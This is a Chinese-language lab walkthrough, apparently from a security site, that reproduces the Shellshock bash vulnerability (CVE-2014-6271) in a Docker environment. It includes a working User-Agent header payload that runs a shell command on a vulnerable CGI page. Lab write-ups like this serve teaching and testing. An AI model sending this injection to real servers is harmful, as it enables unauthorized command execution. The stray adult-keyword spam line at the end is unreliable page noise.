<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    Shellshock 破殼漏洞(CVE-2014-6271)

    Path bash/shellshock

    編譯運行:

    docker-compose up -d
    

    服務啟動后,有兩個頁面http://your-ip:8080/victim.cgihttp://your-ip:8080/safe.cgi。其中safe.cgi是最新版bash生成的頁面,victim.cgi是bash4.3生成的頁面。

    將payload附在User-Agent中訪問victim.cgi:

    User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/id
    

    命令成功被執行:

    同樣的數據包訪問safe.cgi,不受影響:

    本文章首發在 網安wangan.com 網站上。

    上一篇 下一篇
    討論數量: 0
    只看當前版本


    暫無話題~
    亚洲 欧美 自拍 唯美 另类